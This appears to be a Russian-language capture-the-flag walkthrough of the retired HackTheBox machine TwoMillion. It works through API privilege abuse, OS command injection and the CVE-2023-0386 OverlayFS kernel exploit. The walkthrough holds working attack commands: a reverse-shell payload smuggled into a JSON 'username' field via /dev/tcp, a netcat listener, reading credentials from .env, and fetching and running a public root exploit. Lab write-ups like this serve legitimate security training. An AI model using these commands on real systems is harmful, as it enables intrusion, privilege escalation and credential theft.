
Разбор машины TwoMillion от HackTheBox — злоупотребление API, внедрение команд и CVE-2023-0386
HackTheBox — разбор машины TwoMillion — злоупотребление API, внедрение команд и CVE-2023-0386
| Поле | Значение |
|---|---|
| Имя | TwoMillion |
| Сложность | Easy |
| ОС | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion — это простая Linux-машина, посвящённая старой платформе HackTheBox. Она включает расшифровку инвайт-кода, злоупотребление API-эндпоинтами, внедрение команд в ОС, поиск учётных данных и повышение привилегий через уязвимость ядра Linux CVE-2023-0386 (OverlayFS).
nmap -sV -sC -v 10.10.11.221
Открытые порты:
2million.htbДобавить в /etc/hosts:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
Ответ закодирован в ROT13. Расшифровать:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Сгенерировать инвайт-код:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
Зарегистрироваться на http://2million.htb/register, используя расшифрованный инвайт-код.
Войти через браузер, получить PHPSESSID из куки (F12 → Application → Cookies).
Повысить до администратора:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
Проверить:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
Запустить слушатель:
nc -lvnp 4444
Отправить пейлоад реверс-шелла:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
Шелл получен как www-data.
Найти учётные данные в .env:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
Войти по SSH:
ssh [email protected]
cat ~/user.txt
Проверить подсказку:
cat /var/mail/admin
uname -r
# 5.15.70 — уязвим к CVE-2023-0386
Скачать и скомпилировать эксплойт на Kali:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
Передать на цель:
# Kali
python3 -m http.server 8000
# Цель
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
Запустить в двух терминалах на цели:
Терминал 1:
./fuse ./ovlcap/lower ./gc
Терминал 2:
./exp
Получить root-флаг:
cat /root/root.txt
Этот разбор предназначен только для образовательных целей на снятой с производства машине HackTheBox.
| Шаг | Техника |
|---|
| Разведка | Сканирование Nmap |
| Инвайт-код | Расшифровка ROT13 + Base64 |
| Web-повышение привилегий | Манипуляция API → админ |
| Первичный шелл | Внедрение команд ОС |
| Горизонтальное перемещение | Учётные данные из .env → SSH |
| Root | Эксплойт OverlayFS CVE-2023-0386 |